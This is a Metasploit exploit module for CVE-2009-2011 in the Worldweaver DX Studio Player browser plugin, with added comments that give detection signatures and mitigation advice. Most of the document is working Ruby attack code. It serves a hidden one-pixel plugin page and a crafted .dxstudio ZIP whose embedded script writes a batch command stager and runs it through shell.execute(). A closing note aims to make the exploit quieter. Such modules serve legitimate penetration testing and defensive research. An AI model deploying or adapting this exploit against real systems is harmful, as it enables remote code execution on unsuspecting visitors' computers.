
Worldweaver DX Studio Player shell.execute() Command Execution

🗓️ 17 Feb 2010 20:14:40Reported by jduck <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 27 Views

Worldweaver DX Studio Player Command Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

# Metasploit module for CVE-2009-2011 (Worldweaver DX Studio Player, versions
# 3.0.29 and earlier per the description below). It runs an HTTP server that
# hands out two things: an HTML page that loads the DX Studio plug-in, and a
# .dxstudio document whose embedded script writes a batch file and runs it
# through the player's shell.execute() scripting call.
#
# Defender notes, all taken from the code in this class:
# - The landing page instantiates the plug-in via classid
#   0AC2706C-8623-46F8-9EDD-8F71A897FDAE (<object>) and MIME type
#   application/x-dxstudio (<embed>); both are usable as content-inspection
#   signatures for pages that try to load the player.
# - The document is a ZIP archive served as application/octet-stream holding a
#   single header.xml whose onInit() handler calls system.file.openWrite() and
#   shell.execute().
# - On the endpoint the observable behaviour is the browser plug-in creating a
#   .bat file and launching it. The file name is random, so alerting should
#   key on the behaviour rather than on the name.
# - Per the description, IE asks the user once per server host whether the
#   plug-in may access local files.
# NOTE(review): this page does not name a fixed release; confirm the patched
# version against the vendor advisory. Where the plug-in is not needed,
# uninstalling or disabling it removes the exposure.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::CmdStager

  # Registers the module metadata (name, description, references, payload
  # constraints, target list) with the framework by merging it into +info+.
  #
  # info - Hash of metadata supplied by the caller; defaults to an empty Hash.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Worldweaver DX Studio Player shell.execute() Command Execution',
      'Description'    => %q{
        This module exploits a command execution vulnerability within the DX
        Studio Player from Worldweaver for versions 3.0.29 and earlier. The
        player is a browser plugin for IE (ActiveX) and Firefox (dll). When an
        unsuspecting user visits a web page referring to a specially crafted
        .dxstudio document, an attacker can execute arbitrary commands.

        Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20
        and IE 6 on Windows XP SP3. In IE, the user will be prompted if they
        wish to allow the plug-in to access local files. This prompt appears to
        occur only once per server host.

        NOTE: This exploit uses additionally dangerous script features to write
        to local files!
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'jduck' ],
      # Public identifiers for the flaw; use these to look up vendor and
      # scanner coverage.
      'References'     =>
        [
          [ 'CVE', '2009-2011' ],
          [ 'BID', '35273' ],
          [ 'OSVDB', '54969' ],
          [ 'EDB', '8922' ],
          [ 'URL', 'http://dxstudio.com/guide.aspx' ]
        ],
      'Payload'        =>
        {
          'Space'    => 2048,
        },
      'Platform'       => 'win',
      # 'Arch'           => ARCH_CMD,
      # A single generic target; no per-version settings are defined.
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'CmdStagerFlavor' => 'vbs',
      'DisclosureDate' => '2009-06-09',
      'DefaultTarget'  => 0))
  end

  # Answers one HTTP request. A request whose URI contains "payload" receives
  # the ZIP-packed .dxstudio document; every other request receives the HTML
  # page that points the plug-in at that document.
  #
  # cli     - the client connection; its peerhost is read to pick the local
  #           address and it is passed to send_response.
  # request - the HTTP request; only request.uri is read.
  #
  # Returns nothing meaningful. Returns early without sending a response when
  # regenerate_payload yields nil.
  def on_request_uri(cli, request)

    # Build the absolute URL of this server as the client can reach it. When
    # SRVHOST is the wildcard address, use the local source address that
    # routes to the client instead.
    url_base =  "http://"
    url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    url_base += ":" + datastore['SRVPORT'].to_s + get_resource()

    payload_url = url_base + "/payload"

    # handle request for the payload
    # The match is unanchored: any URI containing "payload" takes this branch.
    if (request.uri.match(/payload/))

      # build the payload
      # Stop without answering if no payload could be generated.
      return if ((p = regenerate_payload(cli)) == nil)

      # Turn the payload into command-stager lines (at most 2047 characters
      # each) and wrap every line in a script statement that appends it, plus a
      # newline, to the batch file.
      cmds = generate_cmdstager({:linemax => 2047}, p)
      scr = ""
      cmds.each { |ln|
        scr << "f.writeString('"
        scr << ln
        scr << "\\n');\n"
      }

      # make header.xml
      # Template of the document's script: onInit() opens BATNAME for writing,
      # writes the CMDS statements, closes the file and passes it to
      # shell.execute(). CMDS and BATNAME are placeholders filled in below.
      hdrxml = %Q|<?xml version="1.0"?>
<dxstudio>
<script><![CDATA[function onInit()
{
var f=system.file.openWrite("BATNAME");
f.writeString('@echo off\\n');
CMDS
f.close();
shell.execute("BATNAME");
}]]>
</script>
</dxstudio>
|
      hdrxml.gsub!(/CMDS/, scr);
      # Random alphanumeric name of up to 31 characters plus ".bat"; it changes
      # on every request, so a file-name match is not a dependable indicator.
      # NOTE(review): no directory is given, so where the file lands depends on
      # the player's working directory, which is not visible here.
      bat_name = rand_text_alphanumeric(rand(32)) + ".bat"
      hdrxml.gsub!(/BATNAME/, bat_name);

      # craft the zip archive
      # The archive holds exactly one entry, header.xml.
      zip = Rex::Zip::Archive.new
      zip.add_file("header.xml", hdrxml)
      data = zip.pack

      print_status("Sending file.dxstudio payload")
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })

      # Handle the payload
      # handler(cli)
      return
    end

    # otherwise, send the html..
    # The page loads the plug-in twice over: an <object> with the ActiveX
    # classid for IE and an <embed> with the application/x-dxstudio MIME type
    # for other browsers, both 1x1 pixel. DXURL is a placeholder for the
    # document URL.
    html = %Q|<html>
<body>
<div height=100%>
Please wait...
</div>
<object width=1 height=1 classid='clsid:0AC2706C-8623-46F8-9EDD-8F71A897FDAE'>
<param name="src" value="DXURL" />
<embed width=1 height=1 src=DXURL type="application/x-dxstudio">
</embed>
</object>
</body>
</html>
|

    print_status("Sending #{self.name} HTML")
    # Fill in the document URL and send the page to the client as text/html.
    html.gsub!(/DXURL/, payload_url)
    send_response(cli, html, { 'Content-Type' => 'text/html' })

  end
end

=begin
TODO:
- make it more quiet
- auto-migrate?
=end
